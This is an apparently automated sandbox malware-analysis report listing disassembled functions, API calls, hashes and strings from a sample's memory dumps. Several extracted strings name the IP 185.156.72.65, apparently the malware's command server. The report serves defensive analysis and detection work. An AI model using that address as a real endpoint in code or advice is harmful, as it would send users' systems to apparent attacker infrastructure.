                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID:
                        • API String ID: 3197321146-0
                        • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction ID: a5a8c383a566e357223897e7fa66ea74bf5331801c2a528307aa7bbe19dea5d1
                        • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction Fuzzy Hash: 77C15B709002189FEB24DF54CC85BE9B7B9EF4A305F1041E9E509A72A0DB75BE84CF95
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: b47c96d65a9c32922402c14284ab65e201839dd1ad4cbd5c89f8cfbab560cee2
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: 3A51E572600606AFEB398F58D848BBA73B9EF42316F14453DDA554B292E731F950CB90
                        APIs
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • GetLastError.KERNEL32 ref: 00417548
                        • __dosmaperr.LIBCMT ref: 0041754F
                        • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                        • __dosmaperr.LIBCMT ref: 00417590
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                        APIs
                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                        • GetLastError.KERNEL32 ref: 049477AF
                        • __dosmaperr.LIBCMT ref: 049477B6
                        • GetLastError.KERNEL32(?,?,?,?), ref: 049477F0
                        • __dosmaperr.LIBCMT ref: 049477F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 3f42cc509b088d0e90a731a7a4ac126032c3f89d29f6cd4533dcb3a4a4075a4e
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 60219F71600209AFEB21AFA1C8D0C6BB7ADFFC52787118979E91997250E731FC50CBA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: fec3291de11257372792f846d95a96de2c0d2dee6963ecde032b99d5e1ff827b
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: BE21C071300205AFEB20AF71DC99DBB77AEBFC4268B014935E91A9B150E730FC8087A0
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,049436EF,0493381E,?,00000000,04932AA0,04932AA2,?,04943868,00000022,00420B0C,00422950,00422958,04932AA0), ref: 049436A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction ID: 7ac8437ba04f97455e492d6823a9f0f309c983f6a5be6409435b5a02741009d8
                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction Fuzzy Hash: BE210231B02612BBC731AF74EC46E5A3B6C9B823A0B114234ED06A73A1EB30FD05C6D4
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 049486F4
                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0494872C
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0494874C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: 5d5482b3d7dac2a74fe145a59ae765e5de88a1c0242790c3429a2bb693b327b7
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: FB11C0BA6016197F77217BB6DCD8CAF3DADCEC91A83010934F906A1100FA60FE0282B5
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                        • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                          • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                        • ___initconout.LIBCMT ref: 0041CC5B
                          • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000), ref: 0494CEA6
                        • GetLastError.KERNEL32(?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000,00000000,?,0494A2C8,?), ref: 0494CEB2
                          • Part of subcall function 0494CE78: CloseHandle.KERNEL32(0042CA30,0494CEC2,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000,00000000), ref: 0494CE88
                        • ___initconout.LIBCMT ref: 0494CEC2
                          • Part of subcall function 0494CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0494CE69,0494CAF3,00000000,?,04949D25,00000000,00000000,00000000,00000000), ref: 0494CE4D
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000), ref: 0494CED7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 0e4df125af275dcc813ada621727d7d5e240c2bdd18a86ce420195b90332a194
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 6BF01C36551119BFCF225F95EC08E8A3F26FF886A1B428030FA1996130D7329D219BD4
                        APIs
                        • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                        • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                        • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                        • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                        • String ID:
                        • API String ID: 3269011525-0
                        • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                        • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                        • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                        APIs
                        • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                        • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                        • String ID: vector too long
                        • API String ID: 3646673767-2873823879
                        • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                        • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: http://
                        • API String ID: 0-1121587658
                        • Opcode ID: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                        • Instruction ID: 32d8b7f3cbde112e296c6b2f801fbe9873100f44421498406fbb040862ae1e58
                        • Opcode Fuzzy Hash: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                        • Instruction Fuzzy Hash: 61518071E002099FEB14CFE8C894BEEF7B9EF49304F50862DE915A7680D775A945CBA0
                        APIs
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0493BAA6
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0493BB5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 3480331319-1018135373
                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction ID: 694796231662bcf95a898fde0e2e701fb26c0bc2e67624f3b2fd4797a47625a1
                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction Fuzzy Hash: 7141A734A002199FDF10DF69C884A9EBBF5AF46319F1481B5E814AB356DB31BA01CB90
                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                        APIs
                        • RtlEncodePointer.NTDLL(00000000), ref: 0493C32C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 5e281834ea727d7016924bae745ad42a79e2cfbe063a5ee614a20abbce183676
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: 88414872900609AFDF26CF98CD84AEEBBB9BF4A305F148069F914B7215D335A960DF50
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401084
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401194
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004012A4
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 0493150B
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 049312EB
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 049313FB
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004084EE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00407EEE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04938755
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
